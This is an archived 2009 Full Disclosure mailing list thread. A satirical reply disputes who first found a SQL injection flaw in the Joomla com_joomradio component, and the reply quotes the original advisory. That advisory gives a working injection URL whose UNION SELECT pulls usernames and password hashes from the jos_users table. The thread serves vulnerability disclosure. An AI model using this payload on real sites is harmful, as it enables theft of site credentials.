Full Disclosure mailing list archives
Re: Joomla Component com_joomradio SQL Injection
From: bobby.mugabe () hushmail com
Date: Thu, 19 Feb 2009 10:22:48 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dear gov-boi, Please follow the established etiquette of this list by linking to content on archive.org to establish credibility for alleged historic content. Linking to obscure post-dated content on your own Internet site, that easily can be faked, isn't the best way to attempt legitimizing your darknet archival endeavours. Many on this list are sceptical about your claim regarding the previous discovery of this important computer security issue, and to be quite frank find your attempts to discredit the king of gods' effort to secure this critical piece of Internet infrastructure known as the joomla joomradio something-or-other. Mr. Zeus - on behalf of my country I would like to express our sincere thanks for reporting this severe issue, whether or not it was previously and independently discovered and reported, and hope you continue to contribute your research to this list of full disclosure and helping to make the Internet a safer place for everyone. I would like to remind everyone that this list is for disclosure of information security materials and that the fascist tactics used by the packetstorm/#darknet crowd as they attempt to once again monopolize the dissemination of information security materials is not appreciated here. All the best to you and yours, - -bm On Wed, 18 Feb 2009 17:21:10 -0500 Packet Storm <packet () packetstormsecurity org> wrote:
Already discovered in June, 2008. http://packetstormsecurity.org/0806-exploits/joomlajoomradio- sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0 suffers from a remote SQL injection vulnerability. Authored By <a href="mailto:His0k4.hlm[at]gmail.com">His0k4</a> On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:################################################################### ######### Advisory X # Title: Joomla Component com_joomradio SQL Injection # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: arturo_zamora_c () hotmail com # Website: www.securitybroken.com # Date: 18/02/09 # Risk: Medium # Vendor Url: http://ajaxportal.eu/ # Affected Software: JoomRadio # autor script:author XrByte <info () exp ee>, Grusha<grusha () feellove eu>################################################################### #Example:###################################################################htp://victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_r adio&id=-1UNIONSELECTuser(),concat(username,0x3a,password),user(),user(),user(),user(),u ser()FROM jos_users-- ####################################################################greetz: # # original advisorie: http://www.securitybroken.com##################################################################_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmdeSAACgkQhNp8gzZx3sjQnQP8DIyQpyqWn7ItQxusiG4RvifzrUq3 MyvT2uaVgD6bagNiQo2xpBlxjfAC91ikI18ahveZUX2t1NGwvXhgE7XN4TD531cAGXAU e4D1z+rGmFqfthaDN73PgNr6kHme1TLPszzV7SxzCiZBPaIJZxVKPP0klhZW2Ma5pdOw DXO/Xkw= =bmhh -----END PGP SIGNATURE----- -- Find schools offering psychology programs online. 3 easy steps! http://tagline.hushmail.com/fc/BLSrjkqkOa4cAYuqAs2Rwg48EsDoRE7w8wplgXVKoZaAmTZ8jNnakTcdLkp/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Joomla Component com_joomradio SQL Injection 0o_zeus_o0 (Feb 18)
- Re: Joomla Component com_joomradio SQL Injection Packet Storm (Feb 19)
- <Possible follow-ups>
- Re: Joomla Component com_joomradio SQL Injection bobby . mugabe (Feb 19)
- Re: Joomla Component com_joomradio SQL Injectionhas infolookup (Feb 19)